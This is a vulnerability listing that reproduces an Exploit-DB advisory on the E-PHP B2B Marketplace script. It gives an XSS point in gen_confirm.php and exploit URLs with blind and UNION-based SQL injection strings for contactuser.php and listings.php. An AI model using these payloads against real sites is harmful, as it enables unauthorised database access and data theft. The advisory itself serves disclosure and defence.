E-PHP B2B Marketplace Multiple Vulns

vendor:

B2B Marketplace

by:

Hamza 'MizoZ' N.

6,4

CVSS

MEDIUM

XSS, Blind SQLi, SQLi

79, 89, 89

CWE

Product Name: B2B Marketplace

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2020

E-PHP B2B Marketplace Multiple Vulns

gen_confirm.php shows the error message of $_GET['errmsg'] , but it's not protected against XSS. Exploit : [HOST]/[PATH]/gen_confirm.php?errmsg=. contactuser.php suffers from a blind sqli in the get 'es_id'. Exploit : [HOST]/[PATH]/contactuser.php?es_type=3&es_id=62+and+1=(select 1)--. listings.php suffers from a blind sqli in the get 'mem_id'. Exploit : [HOST]/[PATH]/listings.php?mem_id=-207+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--

Mitigation:

Input validation, parameterized queries, and proper authentication

Source

Exploit-DB raw data:

/*

Name : E-PHP B2B Marketplace Multiple Vulns
WebSite : http://www.ephpscripts.com/b2b-trading-portal.php
Price : 150 USD

Author : Hamza 'MizoZ' N.
Email : mizozx@gmail.com


*/

# XSS

- gen_confirm.php shows the error message of $_GET['errmsg'] , but it's not
protected against XSS

- Exploit : [HOST]/[PATH]/gen_confirm.php?errmsg=

# Blind SQLi

- contactuser.php suffers from a blind sqli in the get "es_id"

- Exploit : [HOST]/[PATH]/contactuser.php?es_type=3&es_id=62+and+1=(select
1)--

# SQLi

- listings.php suffers from a blind sqli in the get "mem_id"

- Exploit :
[HOST]/[PATH]/listings.php?mem_id=-207+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--